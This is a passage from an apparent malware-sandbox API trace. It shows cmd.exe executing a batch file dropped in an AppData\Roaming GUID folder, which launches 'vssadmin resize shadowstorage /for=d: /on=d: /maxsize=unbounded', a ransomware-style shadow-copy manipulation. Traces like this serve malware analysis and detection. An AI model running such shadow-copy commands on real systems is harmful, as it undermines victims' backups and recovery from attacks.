Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.345] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.345] GetProcessHeap () returned 0x3e0000 [0035.345] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0035.345] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0035.345] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.345] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0035.345] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.345] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0035.345] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.345] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0035.346] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.346] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0035.346] SetConsoleInputExeNameW () returned 0x1 [0035.346] GetConsoleOutputCP () returned 0x1b5 [0035.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0035.346] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.346] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0035.346] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.346] SetFilePointer (in: hFile=0x74, lDistanceToMove=198, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc6 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7538 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7408 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72e0 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4280 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7250 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7038 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8258 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0035.347] GetProcessHeap () returned 0x3e0000 [0035.347] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0035.347] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.347] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc6 [0035.347] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x17fb, lpOverlapped=0x0) returned 1 [0035.347] SetFilePointer (in: hFile=0x74, lDistanceToMove=263, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x107 [0035.348] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=65, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\n") returned 65 [0035.348] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.348] GetFileType (hFile=0x74) returned 0x1 [0035.348] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.348] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x107 [0035.348] GetProcessHeap () returned 0x3e0000 [0035.348] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f9ad8 [0035.348] GetProcessHeap () returned 0x3e0000 [0035.348] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9ad8 | out: hHeap=0x3e0000) returned 1 [0035.348] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f81f8 [0035.348] GetProcessHeap () returned 0x3e0000 [0035.348] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0035.348] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x78) returned 0x3f0ee0 [0035.348] _tell (_FileHandle=3) returned 263 [0035.348] _close (_FileHandle=3) returned 0 [0035.349] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0035.349] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0035.349] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0035.349] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0035.349] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0035.349] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0035.349] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0035.349] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0035.349] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0035.349] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0035.349] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0035.349] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0035.349] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0035.349] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0035.349] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0035.349] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0035.349] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0035.349] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0035.349] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0035.349] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0035.349] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0035.349] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0035.349] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0035.349] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0035.349] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0035.349] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0035.349] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0035.349] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0035.349] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0035.349] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0035.349] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0035.349] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0035.350] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0035.350] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0035.350] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0035.350] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0035.350] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0035.350] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0035.350] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0035.350] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0035.350] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0035.350] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0035.350] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0035.350] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0035.350] SetErrorMode (uMode=0x0) returned 0x1 [0035.350] GetProcessHeap () returned 0x3e0000 [0035.350] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0035.350] GetProcessHeap () returned 0x3e0000 [0035.350] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0035.350] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.350] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.350] GetProcessHeap () returned 0x3e0000 [0035.350] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0035.350] GetProcessHeap () returned 0x3e0000 [0035.350] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0035.350] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0035.350] GetProcessHeap () returned 0x3e0000 [0035.350] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0035.350] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.350] GetProcessHeap () returned 0x3e0000 [0035.350] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f6fb8 [0035.350] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6fb8, Size=0x76) returned 0x3f6fb8 [0035.351] GetProcessHeap () returned 0x3e0000 [0035.351] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6fb8) returned 0x76 [0035.351] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.351] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.351] GetLastError () returned 0x2 [0035.351] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.351] GetLastError () returned 0x2 [0035.351] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.351] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0035.351] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.351] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.351] GetLastError () returned 0x2 [0035.351] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0035.352] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.352] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.352] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.352] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.352] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7038 [0035.352] GetProcessHeap () returned 0x3e0000 [0035.352] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x8a) returned 0x3f7250 [0035.352] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4280 [0035.352] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f4288, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0035.352] SetErrorMode (uMode=0x0) returned 0x1 [0035.352] GetProcessHeap () returned 0x3e0000 [0035.352] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4280, Size=0x66) returned 0x3f4280 [0035.352] GetProcessHeap () returned 0x3e0000 [0035.352] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4280) returned 0x66 [0035.352] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.352] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.353] GetProcessHeap () returned 0x3e0000 [0035.353] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72e8 [0035.353] GetProcessHeap () returned 0x3e0000 [0035.353] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7410 [0035.353] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7410, Size=0x122) returned 0x3f7410 [0035.353] GetProcessHeap () returned 0x3e0000 [0035.353] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7410) returned 0x122 [0035.353] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.353] GetProcessHeap () returned 0x3e0000 [0035.353] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7540 [0035.353] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7540, Size=0x76) returned 0x3f7540 [0035.353] GetProcessHeap () returned 0x3e0000 [0035.353] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7540) returned 0x76 [0035.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.353] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.353] GetLastError () returned 0x2 [0035.353] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.353] GetLastError () returned 0x2 [0035.353] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.353] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0035.353] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.354] GetLastError () returned 0x2 [0035.354] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0035.354] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.354] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.354] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.354] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.354] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0035.354] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0035.354] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0035.354] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0035.354] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.354] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0035.354] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.354] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.354] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.354] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.354] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.354] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.354] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.355] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.355] GetProcessHeap () returned 0x3e0000 [0035.355] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0035.355] GetProcessHeap () returned 0x3e0000 [0035.356] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0035.356] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.356] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa18, dwThreadId=0xa1c)) returned 1 [0035.360] CloseHandle (hObject=0x74) returned 1 [0035.360] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.360] GetProcessHeap () returned 0x3e0000 [0035.360] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.360] GetEnvironmentStringsW () returned 0x3f8408* [0035.360] GetProcessHeap () returned 0x3e0000 [0035.360] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.360] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.360] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0035.486] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0035.486] CloseHandle (hObject=0x78) returned 1 [0035.486] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0035.486] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0035.486] GetProcessHeap () returned 0x3e0000 [0035.486] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.486] GetEnvironmentStringsW () returned 0x3f8408* [0035.486] GetProcessHeap () returned 0x3e0000 [0035.486] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.487] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.487] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0035.487] GetProcessHeap () returned 0x3e0000 [0035.487] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.487] GetEnvironmentStringsW () returned 0x3f8408* [0035.487] GetProcessHeap () returned 0x3e0000 [0035.487] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.487] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.487] GetProcessHeap () returned 0x3e0000 [0035.487] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0035.487] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0035.487] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.487] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0035.487] _get_osfhandle (_FileHandle=1) returned 0x264 [0035.487] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0035.487] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0035.487] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0035.487] _get_osfhandle (_FileHandle=0) returned 